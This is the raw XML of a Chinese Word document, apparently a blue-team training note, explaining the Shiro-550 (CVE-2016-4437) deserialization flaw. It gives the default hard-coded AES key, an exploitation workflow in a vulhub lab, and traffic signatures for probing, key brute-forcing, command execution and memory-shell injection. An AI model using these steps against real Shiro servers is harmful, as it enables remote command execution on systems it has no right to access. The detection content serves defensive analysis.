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51B3D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/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>中间件及框架漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2B76C" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100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常见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中间件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx、Apache、Tomcat、Redis、Zookeeper</w:t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ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RabbitMQ、Kafka等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79736FEA" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:before="100" w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val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一、框架漏洞之shrio漏洞原理和流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C99615D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 xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shiro-550</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/Shiro反序列化漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2016-4437</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03390248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7FB655B7" wp14:editId="1103522F">
            <wp:extent cx="6202680" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="5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414C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 w:line="0" w:lineRule="atLeast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①漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEAE2D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Shiro框架用户登录时提供了rememberMe功能，登录时浏览器会增加一个key为rememberMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0D47F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的cookie（cookie值是通过序列化、AES加密和Base64编码得到）。后面在执行反序列化操作时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8EC43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没有进行任何过滤，攻击者可以使用Shiro的默认密钥构造恶意序列化对象进行编码来伪造用户的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A6AF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Cookie，服务端反序列化时触发漏洞，从而执行命令。影响版本：Shiro &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 1.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B7532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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务器端在接收到cookie时，会执行以下步骤来解析和处理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE314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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1. 检索rememberMe cookie的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB51B0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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2. 执行Base64解码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DBACA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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. 执行AES解密。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417B178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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. 执行反序列化操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41502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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>由于在第4步中反序列化操作没有进行任何过滤，这可能导致Java反序列化漏洞，从而在目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ACF36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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>标机器上执行任意命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401E32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由于使用AES加密，利用该漏洞需要获取AES的加密密钥，在Shiro1.2.4版本前，AES 加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6774F06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密钥是硬编码的，其默认密钥的 Base64 编码值为kPH+bIxk5D2deZiIxcaaaA== 。因此，攻击者可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C370B4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以构建恶意的payload。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B7E88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特征总结：返回包中包含rememberMe=deleteMe字段。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F443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或直接发送原数据包，返回的数据中不存在关键字，可以通过在发送数据包的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中增加字段：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C8403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rememberMe=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>任意值，然后查看返回数据包中是否存在关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254D9E5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 w:line="0" w:lineRule="atLeast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②登录失败流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C38047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抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F9CF3" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="0" w:lineRule="atLeast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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="47747C90" wp14:editId="5ADB6F96">
            <wp:extent cx="6480175" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="1206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2368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4E2C8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lastRenderedPageBreak/>
        <w:t>登录失败流量特征：登录失败，返回包就会返回Set-Cookie:remember=deleteMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7CD797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2F54AE13" wp14:editId="5EA6EDE9">
            <wp:extent cx="6370320" cy="2323465"/>
            <wp:effectExtent l="0" t="0" r="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b="21324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799E4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 w:line="0" w:lineRule="atLeast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③登录成功流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D879817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如果登录成功：就会出现正确的那个 set-Cookie：remember=正确值，是个很长的一串字符，最后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2A983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下面还提示登录成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638DC381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4501E9C6" wp14:editId="75721A82">
            <wp:extent cx="6478270" cy="2444750"/>
            <wp:effectExtent l="0" t="0" r="13970" b="889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b="7837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1F8D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 w:line="0" w:lineRule="atLeast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④工具爆破shiro的流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D14F7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先判断该网站是否使用了shiro框架。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E19F7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直接设置一个Cookie: rememberMe=yes，看返回包有没有Set-Cookie: rememberMe=deleteMe（也</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B00E1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就是登录失败）判断是不是存在shiro框架。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718A0F5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356FD54E" wp14:editId="1E56D05A">
            <wp:extent cx="6477635" cy="2896870"/>
            <wp:effectExtent l="0" t="0" r="14605" b="139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3975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可以看到这里直接设置了一个Cookie：remember=yes 来进行探测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7432CC1C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0383DD52" wp14:editId="74CE5758">
            <wp:extent cx="6370320" cy="2168525"/>
            <wp:effectExtent l="0" t="0" r="0" b="1079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D3BA4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2AF9D2E4" wp14:editId="4D1C3B7C">
            <wp:extent cx="6431280" cy="2424430"/>
            <wp:effectExtent l="0" t="0" r="0" b="139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5EAF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网站返回 Set-Cookie: remember=deleteMe证明网站存在shiro框架。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C36D75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4F22E8E6" wp14:editId="094DAC21">
            <wp:extent cx="6454140" cy="2268220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="25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ADAAC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03D12909" wp14:editId="0A1FF6D8">
            <wp:extent cx="6377940" cy="2357755"/>
            <wp:effectExtent l="0" t="0" r="7620" b="444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3E907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 w:line="0" w:lineRule="atLeast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lastRenderedPageBreak/>
        <w:t>⑤爆破密匙成功流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF84A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设置Cookie: rememberMe=yes，看看返回包有没有Set-Cookie: rememberMe=deleteMe，判断是不</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40904BE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是存在shiro组件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABD1CA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然后再设置一个通过秘钥进行加密的序列化字符串，然后通过返回包来判断是不是爆破成功，如果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4401524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返回包没有返回Set-Cookie: rememberMe=deleteMe，那就是爆破成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDD0A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抓爆破包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA30E4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074D7545" wp14:editId="41987F67">
            <wp:extent cx="6438900" cy="4221480"/>
            <wp:effectExtent l="0" t="0" r="762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8AB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看返回包：下面这种就是秘钥爆破成功！因为返回包不再出现rememberMe=deleteMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FFC6C6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125C7A1F" wp14:editId="00C5B9BA">
            <wp:extent cx="6431280" cy="3101340"/>
            <wp:effectExtent l="0" t="0" r="0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7A49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2D5532FD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3891E01D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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3C72CC78" wp14:editId="1B1ADE68">
            <wp:extent cx="6408420" cy="2849880"/>
            <wp:effectExtent l="0" t="0" r="762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F87F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然后再cookie里瞎添加一个字母，出现Set-Cookie: rememberMe=deleteMe，即秘钥爆破失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391FB086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70D2ED4E" wp14:editId="66E6CC02">
            <wp:extent cx="6454140" cy="3040380"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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DB73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 w:line="0" w:lineRule="atLeast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⑥利益链爆破流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C68B4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如果在秘钥正确的情况下，进行利用链爆破，就会出现，cookie非常长的情况。如果在研判中发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA7EC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现cookie非常长，并且返回包状态码为200，那就要考虑网站是否被入侵了！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473EA3E2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3F2D608A" wp14:editId="4ADD529E">
            <wp:extent cx="6446520" cy="2514600"/>
            <wp:effectExtent l="0" t="0" r="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1FE27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381FEAF8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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="27B751FD" wp14:editId="3ED1218A">
            <wp:extent cx="6454140" cy="2674620"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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60CE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利用失败的情况下：就会出现Set-Cookie: rememberMe=deleteMe;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9C779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780081AC" wp14:editId="467B9BD2">
            <wp:extent cx="6438900" cy="2522220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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205C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 w:line="0" w:lineRule="atLeast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⑦执行命令流量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F24341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70C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>执行命令时流量特征是，rememberme 非常长，且返回值是加密的，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开头和结尾都带三个$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF08D2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执行命令whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69634590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0F159657" wp14:editId="4A355348">
            <wp:extent cx="6476365" cy="2863215"/>
            <wp:effectExtent l="0" t="0" r="635" b="190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09AF4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1AF53CDD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4D2CA2EE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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7AC8DC86" wp14:editId="06C10C0D">
            <wp:extent cx="6476365" cy="2282825"/>
            <wp:effectExtent l="0" t="0" r="635" b="317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6A9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执行命令ls -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACCEC70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36F7FC81" wp14:editId="629EBA07">
            <wp:extent cx="6474460" cy="2472690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1143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74666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7E537E39" wp14:editId="641E4F2F">
            <wp:extent cx="6477000" cy="1704975"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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49C5C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 w:line="0" w:lineRule="atLeast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⑧注入内存马的流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F3F1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进行注入内存马，然后抓包查看流量的特征。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43AAF1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79D0AF4A" wp14:editId="55E19554">
            <wp:extent cx="6339840" cy="2434590"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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E71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可以看到，注入内存马时cookie值非常长，且数据包体pass参数非常长，也都是加密的数值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230B7430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4A2AA3A3" wp14:editId="60D4822C">
            <wp:extent cx="6478270" cy="2932430"/>
            <wp:effectExtent l="0" t="0" r="13970" b="889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219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5392C9A5" wp14:editId="414E9BDA">
            <wp:extent cx="6474460" cy="1931035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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58021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 w:line="0" w:lineRule="atLeast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⑨复现利用流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6164A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如下：先构造恶意命令--&gt;然后进行序列化--&gt;AES加密--&gt;Base64编码--&gt;得到cookie发给服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025E4B0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为了解决这个问题，官方移除了硬编码的密钥，通过每次仅生成一个新密钥来解决漏洞。不过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767143E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攻击者还可以通过搜索引擎等途径收集不同的密钥，从而提高攻击的成功率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7245DDA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漏洞复现：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以用vulhub靶场进入此漏洞目录--&gt;运行shiro550漏洞的容器--&gt;然后访问站点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54B152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7FBDDD06" wp14:editId="31D51F6C">
            <wp:extent cx="5971540" cy="1885315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1384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图片 66"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect t="3304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816A" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E288544" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638D5FA9" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419BCE0E" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113CCC00" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646AD877" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FF3D78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勾选Remember Me，随便输入用户名和密码抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E6288A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发送响应请求：添加remember=任意值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE3165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响应包出现set-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cookie:rememberMe=deleteMe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字段，证明该系统是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Shiro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>框架。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA99B73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58234FF8" wp14:editId="5DBFBFD9">
            <wp:extent cx="5969000" cy="2560955"/>
            <wp:effectExtent l="0" t="0" r="5080" b="14605"/>
            <wp:docPr id="1385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" name="图片 67"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="6538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679E" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl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检测漏洞：分三步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3CCDE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1、获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shiro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">加密密钥 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3BE8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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、生成恶意的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，并通过获取到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">密钥加密 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA22AD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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来进行检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B538C5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添加burp插件：插件BurpShiroPassiveScan（仅提取秘钥）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B016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然后输入用户名和密码抓包shiro的登录页面的包，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>抓到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Shiro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数据包时会自动检测，当发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2920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现存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Shiro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
